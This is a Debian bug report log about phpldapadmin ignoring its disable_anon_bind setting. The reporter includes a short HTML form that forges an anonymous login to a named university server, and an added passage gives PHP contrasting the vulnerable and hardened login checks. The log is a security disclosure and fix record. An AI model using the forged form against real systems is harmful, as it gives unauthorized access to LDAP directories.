Debian Bug report logs - #322423
$servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to access ldap directory


Package: phpldapadmin; Maintainer for phpldapadmin is Fabio Tranchitella <kobold@debian.org>; Source for phpldapadmin is src:phpldapadmin.

Reported by: Alexander Gerasiov <gq@cs.msu.su>

Date: Wed, 10 Aug 2005 15:48:03 UTC

Severity: grave

Tags: security

Found in version phpldapadmin/0.9.6c-4

Fixed in version phpldapadmin/0.9.6c-5

Done: Fabio Tranchitella <kobold@debian.org>

Bug is archived. No further changes may be made.




Report forwarded to debian-bugs-dist@lists.debian.org, Fabio Tranchitella <kobold@debian.org>:
Bug#322423; Package phpldapadmin.

Acknowledgement sent to Alexander Gerasiov <gq@cs.msu.su>:
New Bug report received and forwarded. Copy sent to Fabio Tranchitella <kobold@debian.org>.

Message #5 received at submit@bugs.debian.org:

From: Alexander Gerasiov <gq@cs.msu.su>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: $servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to access ldap directory
Date: Wed, 10 Aug 2005 19:35:23 +0400
Package: phpldapadmin
Version: 0.9.6c-4
Severity: critical
Tags: security

Even if you deny anonymous login with disable_anon_bind anyone could
access your LDAP server.

As far as I can see, this option only hides the checkbox on the login page, but
anyone can create a workaround hack:

==========example form to log into eol.lvk.cs.msu.su========
<html><body>

<form action="https://eol.lvk.cs.msu.su/phpldapadmin/login.php"
method="post" name="login_form">
<input type="hidden" name="server_id" value="0" />
<input type="checkbox" name="anonymous_bind" checked />
<input type="submit" name="submit" value="login" />
</form>

</body></html>
=============================================================

I think that the version in sarge is also vulnerable to this trick.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)

Versions of packages phpldapadmin depends on:
ii  apache [httpd]               1.3.33-6    versatile, high-performance HTTP s
ii  debconf                      1.4.30.13   Debian configuration management sy
ii  php4                         4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-cgi                     4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-ldap                    4:4.3.10-15 LDAP module for php4

-- debconf information:
  phpldapadmin/ldap-bindpw: secret
  phpldapadmin/ldap-tls: false
  phpldapadmin/ldap-binddn: cn=admin,dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
* phpldapadmin/reconfigure-webserver: apache
* phpldapadmin/restart-webserver: true
  phpldapadmin/ldap-basedn: dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
  phpldapadmin/ldap-server: localhost
* phpldapadmin/ldap-authtype: cookie
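
The defect the report describes is a server-side check that was never made: the login handler trusted the POSTed anonymous_bind field, and disable_anon_bind only removed the checkbox from the HTML. The following PHP is an added illustration, not phpldapadmin's code or the Debian patch; it keeps the option and field names from the report ($servers, disable_anon_bind, anonymous_bind, server_id) and constructs everything else (the login_dn/login_pass field names, the decide_bind_* functions, the sample config and POST) for the example, assuming PHP 7 or later.

```php
<?php
// Added illustration, not phpldapadmin's own code. The point: the configuration
// must be consulted in the handler, because hiding a checkbox in the form does
// nothing to stop a client from POSTing anonymous_bind=on directly.

// Vulnerable pattern (the behaviour the bug report describes): the handler
// trusts the form field and never consults $servers[$i]['disable_anon_bind'].
function decide_bind_vulnerable(array $server, array $post)
{
    if (!empty($post['anonymous_bind'])) {
        // Empty DN and password means an anonymous LDAP bind; config ignored.
        return ['bind_dn' => '', 'bind_pw' => ''];
    }
    return [
        'bind_dn' => (string)($post['login_dn'] ?? ''),   // hypothetical field name
        'bind_pw' => (string)($post['login_pass'] ?? ''), // hypothetical field name
    ];
}

// Hardened pattern: the server configuration decides, not the client.
// Returns null when the login must be refused (caller logs it and shows an error).
function decide_bind_hardened(array $server, array $post)
{
    $want_anon = !empty($post['anonymous_bind']);

    if ($want_anon && !empty($server['disable_anon_bind'])) {
        return null; // anonymous bind requested but disabled in config: refuse
    }
    if ($want_anon) {
        return ['bind_dn' => '', 'bind_pw' => ''];
    }

    $dn = trim((string)($post['login_dn'] ?? ''));
    $pw = (string)($post['login_pass'] ?? '');

    // A non-empty DN with an empty password is an "unauthenticated" bind
    // (RFC 4513 section 5.1.2), which many directories treat like an anonymous
    // one; an empty DN is anonymous outright. Neither counts as a credentialed
    // login, so refuse both on this path rather than passing them to ldap_bind().
    if ($dn === '' || $pw === '') {
        return null;
    }
    return ['bind_dn' => $dn, 'bind_pw' => $pw];
}

// Constructed sample: anonymous bind disabled in config, but the forged form
// from the report submits anonymous_bind anyway.
$servers = [0 => ['name' => 'example', 'disable_anon_bind' => true]];
$forged_post = ['server_id' => '0', 'anonymous_bind' => 'on', 'submit' => 'login'];
$server = $servers[(int)$forged_post['server_id']];

var_dump(decide_bind_vulnerable($server, $forged_post)); // array with empty DN/pw: the bug
var_dump(decide_bind_hardened($server, $forged_post));   // NULL: refused
```

The same rule generalises to any option that removes a control from a form: the value the client sends is input, not policy, and the server re-derives the policy from its own configuration on every request.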



Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#322423; Package phpldapadmin.

Acknowledgement sent to Fabio Tranchitella <kobold@debian.org>:
Extra info received and forwarded to list.

Message #10 received at submit@bugs.debian.org:

From: Fabio Tranchitella <kobold@debian.org>
To: 322423@bugs.debian.org, Alexander Gerasiov <gq@cs.msu.su>
Cc: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Re: Bug#322423: $servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to access ldap directory
Date: Wed, 10 Aug 2005 17:55:18 +0200
On Wed, 10/08/2005 at 19.35 +0400, Alexander Gerasiov wrote:
> Package: phpldapadmin
> Version: 0.9.6c-4
> Severity: critical
> Tags: security
> 
> Even if you deny anonymous login with disable_anon_bind anyone could
> access your LDAP server.
> 
> As far as I can see, this option only hides the checkbox on the login page, but
> anyone can create a workaround hack:

Thanks for pointing this out.

I'm preparing a patch and a new package for this, it will be ready in a
few hours.

-- 
Fabio Tranchitella <kobold@debian.org>                        .''`.
Proud Debian GNU/Linux developer, admin and user.            : :'  :
                                                             `. `'`
   http://people.debian.org/~kobold/                           `-
_____________________________________________________________________
1024D/7F961564, fpr 5465 6E69 E559 6466 BF3D 9F01 2BF8 EE2B 7F96 1564

Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#322423; Package phpldapadmin.

Acknowledgement sent to Fabio Tranchitella <kobold@debian.org>:
Extra info received and forwarded to list.

Reply sent to Fabio Tranchitella <kobold@debian.org>:
You have taken responsibility.

Notification sent to Alexander Gerasiov <gq@cs.msu.su>:
Bug acknowledged by developer.

Message #20 received at 322423-close@bugs.debian.org:

From: Fabio Tranchitella <kobold@debian.org>
To: 322423-close@bugs.debian.org
Subject: Bug#322423: fixed in phpldapadmin 0.9.6c-5
Date: Wed, 10 Aug 2005 10:32:17 -0700
Source: phpldapadmin
Source-Version: 0.9.6c-5

We believe that the bug you reported is fixed in the latest version of
phpldapadmin, which is due to be installed in the Debian FTP archive:

phpldapadmin_0.9.6c-5.diff.gz
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.diff.gz
phpldapadmin_0.9.6c-5.dsc
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.dsc
phpldapadmin_0.9.6c-5_all.deb
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 322423@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Fabio Tranchitella <kobold@debian.org> (supplier of updated phpldapadmin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Wed, 10 Aug 2005 17:14:01 +0000
Source: phpldapadmin
Binary: phpldapadmin
Architecture: source all
Version: 0.9.6c-5
Distribution: unstable
Urgency: high
Maintainer: Fabio Tranchitella <kobold@debian.org>
Changed-By: Fabio Tranchitella <kobold@debian.org>
Description: 
 phpldapadmin - web based interface for administering LDAP servers
Closes: 322423
Changes: 
 phpldapadmin (0.9.6c-5) unstable; urgency=high
 .
   * debian/control: added build-deps on dpatch.
   * debian/patches/login.dpatch: really block anonymous login when disabled
     by config files. (Closes: #322423)
Files: 
 59bd6b27ce9498c9c4408a36dcdbb388 617 admin extra phpldapadmin_0.9.6c-5.dsc
 a4e84ec8e644aa65d2b735f87ee734d6 13449 admin extra phpldapadmin_0.9.6c-5.diff.gz
 20d8733a521b99277a526caf61bc9c57 714834 admin extra phpldapadmin_0.9.6c-5_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFC+jYJK/juK3+WFWQRAhowAKCgt4oKUWxK0vC4+fpgtAjtZY0NnwCeP+zs
uXNUDOVdCNcBowv8aWp1ekM=
=ooMS
-----END PGP SIGNATURE-----




Severity set to `grave'. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 24 Jun 2007 21:41:03 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 08:52:44 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.